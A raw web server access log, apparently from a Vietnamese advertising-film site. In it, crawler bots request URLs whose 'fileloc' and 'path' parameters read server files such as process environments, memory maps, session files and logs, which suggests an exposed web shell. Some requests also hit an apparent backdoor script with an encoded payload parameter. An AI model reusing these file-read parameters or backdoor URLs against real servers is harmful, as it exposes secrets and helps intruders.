34.204.150.196 - - [09/Nov/2025:00:03:33 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/unlink&path=//usr/bin HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:03:34 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/cpu0/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3456 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:34 +0000] "GET /178hpr1480.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory15/node0/cpu1/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:03:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/auxv&path=//proc/20 HTTP/1.0" 200 2820 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:03:36 +0000] "GET /178hpr1480.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.200.58.199 - - [09/Nov/2025:00:03:37 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/unlink&path=//usr/bin HTTP/1.0" 200 2822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:03:38 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory13/node0/cpu1/driver/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3457 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:38 +0000] "GET /33skl42333.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:03:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/cgroup&path=//proc/20 HTTP/1.0" 200 2927 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:03:40 +0000] "GET /21mjm32689.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/cpu0/driver/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.221.222.168 - - [09/Nov/2025:00:03:41 +0000] "GET /our-works/corporate/marina-plaza/?path=//proc/8 HTTP/1.0" 200 4704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:03:42 +0000] "GET /33skl42333.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:03:42 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fsys%2Fclass%2Finput%2Finput0%2Fsubsystem%2Fevent3%2Fdevice%2Fsubsystem%2Fevent1%2Fdevice%2Finput1%3A%3Anumlock%2Fsubsystem HTTP/1.0" 200 3304 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
79.137.67.30 - - [09/Nov/2025:00:03:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/clear_refs&path=//proc/20 HTTP/1.0" 200 2825 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:03:43 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/firmware_node/subsystem/drivers HTTP/1.0" 200 3556 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:03:45 +0000] "GET /42cmm48234.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.73.68.20 - - [09/Nov/2025:00:03:46 +0000] "GET /our-works/tvc-caltex-havoline/?fileloc=//sys/kernel/kexec_crash_size&path=//sys/kernel HTTP/1.0" 200 2832 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:03:47 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu1/subsystem/drivers/processor/cpu0/hotplug HTTP/1.0" 200 3372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
119.13.90.120 - - [09/Nov/2025:00:03:47 +0000] "GET /3d-film-traning/video/phim-3d?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-trackback.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4709 "http://lamphimquangcao.net/3d-film-traning/video/phim-3d?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-trackback.php&path=/var/www/lamphim/data/www/lamphimquangcao.net" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:00:01:28 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303038352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634363438352q6461636231323637376337383262646130396462393330316332373039353331222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
79.137.67.30 - - [09/Nov/2025:00:03:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/cmdline&path=//proc/20 HTTP/1.0" 200 2822 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:03:50 +0000] "GET /21mjm32689.html?path=/var/www/lamphim/data/tmp HTTP/1.0" 200 5828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:03:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/firmware_node/subsystem/devices HTTP/1.0" 200 5034 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.220.148.166 - - [09/Nov/2025:00:03:53 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//usr/bin/write&path=//usr/bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:03:53 +0000] "GET /33skl42333.html?path=/var/www/lamphim/data/logs HTTP/1.0" 200 5662 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:03:54 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/comm&path=//proc/20 HTTP/1.0" 200 2835 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
3.94.156.104 - - [09/Nov/2025:00:03:55 +0000] "GET /our-works/tvc-relax-gaba/?path=//lib/python3.8/importlib HTTP/1.0" 200 3543 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:03:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu0/driver/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3453 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:03:57 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-192%2Fcgroup%2Fkmalloc-192%28838%3Adovecot.service%29%2Fslabs&path=%2F%2Fsys%2Fkernel%2Fslab%2Fkmalloc-192%2Fcgroup%2Fkmalloc-192%28838%3Adovecot.service%29 HTTP/1.0" 200 2882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.167.144.187 - - [09/Nov/2025:00:03:58 +0000] "GET /?products=53679340 HTTP/1.0" 200 25628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:03:59 +0000] "GET /178hpr1480.html?fileloc=/var/www/lamphim/data/tmp/sess_12unfvrqkppoetf0bsh4c7dg46&path=/var/www/lamphim/data/tmp HTTP/1.0" 200 2888 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.195.248.30 - - [09/Nov/2025:00:04:00 +0000] "GET /our-works/tvc-caltex-havoline/?fileloc=//lib/php/sessionclean&path=//lib/php HTTP/1.0" 200 4399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:04:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu0/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 3450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:04:01 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/coredump_filter&path=//proc/20 HTTP/1.0" 200 2828 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.167.144.187 - - [09/Nov/2025:00:04:02 +0000] "GET /?products=614921920 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.4.229.9 - - [09/Nov/2025:00:04:02 +0000] "GET /our-works/tvc-relax-gaba/?path=//lib/python3.8/importlib HTTP/1.0" 200 3543 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:04:03 +0000] "GET /61aotk11625.html?path=/var/www/lamphim/data HTTP/1.0" 200 3493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.222 - - [09/Nov/2025:00:04:04 +0000] "GET /?products=50660020 HTTP/1.0" 200 25132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:04:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
40.77.167.254 - - [09/Nov/2025:00:04:06 +0000] "GET /?products=1732187826 HTTP/1.0" 200 25974 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
79.137.67.30 - - [09/Nov/2025:00:04:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/cpuset&path=//proc/20 HTTP/1.0" 200 2822 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:04:07 +0000] "GET /68pryp42118.html?path=/var/www/lamphim/data HTTP/1.0" 200 3493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.45.29.57 - - [09/Nov/2025:00:04:09 +0000] "GET /our-works/corporate/marina-plaza/?fileloc=//bin/nisdomainname&path=//bin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:04:09 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/cpu0/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3456 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.167.144.222 - - [09/Nov/2025:00:04:09 +0000] "GET /?products=53625066 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
34.236.135.14 - - [09/Nov/2025:00:04:10 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/true&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:04:11 +0000] "GET /q-~116GH2NEbmlstNah1NefU9XuyjLiICrlo7741/ HTTP/1.0" 200 4759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:04:11 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fshare%2Fzoneinfo%2Fright%2FAmerica%2FIndianapolis&path=%2F%2Fusr%2Fshare%2Fzoneinfo%2Fright%2FAmerica HTTP/1.0" 200 2859 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
79.137.67.30 - - [09/Nov/2025:00:04:12 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/environ&path=//proc/20 HTTP/1.0" 200 2823 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.79.248.20 - - [09/Nov/2025:00:01:52 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303131302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634363531302q3563373232326162303465376131343936366533626331663134343931613939222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.189 - - [09/Nov/2025:00:04:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/cpu0/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 3450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:04:14 +0000] "GET /33skl42333.html?fileloc=/var/www/lamphim/data/logs/lamphim.viecde.com-frontend.access.log.2.gz&path=/var/www/lamphim/data/logs HTTP/1.0" 200 2878 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.154.211 - - [09/Nov/2025:00:04:14 +0000] "GET /q-~69ljd5R3HvZkgzPUE3PwV0VNULDu6V9t12294/ HTTP/1.0" 200 4759 "https://lamphimquangcao.net/sitemap546.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
52.205.222.214 - - [09/Nov/2025:00:04:15 +0000] "GET /our-works/tvc-calci/?fileloc=//usr/bin/true&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
79.137.67.30 - - [09/Nov/2025:00:04:16 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/gid_map&path=//proc/20 HTTP/1.0" 200 2838 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:04:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/firmware_node/subsystem/drivers/hpet HTTP/1.0" 200 3388 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:04:17 +0000] "GET /q-~142WdCwljeEtz8hsVU8kkoTlpDujoiqYH23835/ HTTP/1.0" 200 4760 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.214.138.148 - - [09/Nov/2025:00:04:18 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/seq&path=//usr/bin HTTP/1.0" 200 166 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:04:18 +0000] "GET /61aotk11625.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:04:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/firmware_node/subsystem/drivers/battery HTTP/1.0" 200 3388 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:04:19 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/limits&path=//proc/20 HTTP/1.0" 200 3081 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:04:21 +0000] "GET /33skl42333.html?fileloc=/var/www/lamphim/data/logs/lamphim.viecde.com-backend.error.log.1&path=/var/www/lamphim/data/logs HTTP/1.0" 500 816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.227.156.153 - - [09/Nov/2025:00:04:21 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/seq&path=//usr/bin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:04:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/subsystem/drivers/processor/cpu1/driver HTTP/1.0" 200 3452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:00:04:23 +0000] "GET /68pryp42118.html?path=/var/www/lamphim/data/php-bin HTTP/1.0" 200 2911 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:04:23 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/loginuid&path=//proc/20 HTTP/1.0" 200 2832 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:04:24 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 3450 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.204.12.115 - - [09/Nov/2025:00:04:25 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//bin/sieve-test&path=//bin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:00:04:25 +0000] "GET /q-~116GH2NEbmlstNah1NefU9XuyjLiICrlo7741/?path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes HTTP/1.0" 200 12674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:04:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/firmware_node/subsystem/drivers/button HTTP/1.0" 200 3474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:04:26 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/maps&path=//proc/20 HTTP/1.0" 200 2820 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [09/Nov/2025:00:04:28 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/cpu0/subsystem/drivers/processor/cpu0/driver/unbind&path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/cpu0/subsystem/drivers/processor/cpu0/driver HTTP/1.0" 200 2949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:00:04:28 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsys%2Fdev%2Fblock%2F7%3A2%2Fsubsystem%2Floop5%2Fsubsystem%2Fsda%2Fqueue%2Fwbt_lat_usec&path=%2F%2Fsys%2Fdev%2Fblock%2F7%3A2%2Fsubsystem%2Floop5%2Fsubsystem%2Fsda%2Fqueue HTTP/1.0" 200 2898 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:00:04:29 +0000] "GET /q-~116GH2NEbmlstNah1NefU9XuyjLiICrlo7741/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.204.71.8 - - [09/Nov/2025:00:04:30 +0000] "GET /our-works/tvc-jokky/?fileloc=//usr/bin/rtstat&path=//usr/bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:00:04:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu1/subsystem/drivers/processor/cpu1/hotplug HTTP/1.0" 200 3365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
79.137.67.30 - - [09/Nov/2025:00:04:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/20/mem&path=//proc/20 HTTP/1.0" 200 2820 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [09/Nov/2025:00:04:32 +0000] "GET /q-~142WdCwljeEtz8hsVU8kkoTlpDujoiqYH23835/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images HTTP/1.0" 200 3289 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:00:04:33 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/cpu1/driver/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.214.186.220 - - [09/Nov/2025:00:04:33 +0000] "GET /our-works/tvc-kimino/?fileloc=//bin/vmtoolsd&path=//bin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:00:02:14 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635303133342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634363533342q3138396463326137633664643133656562316165363730653135633734303035222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.51 - - [09/Nov/2025:00:04:36 +0000] "GET /q-~142WdCwljeEtz8hsVU8kkoTlpDujoiqYH23835/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/product.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
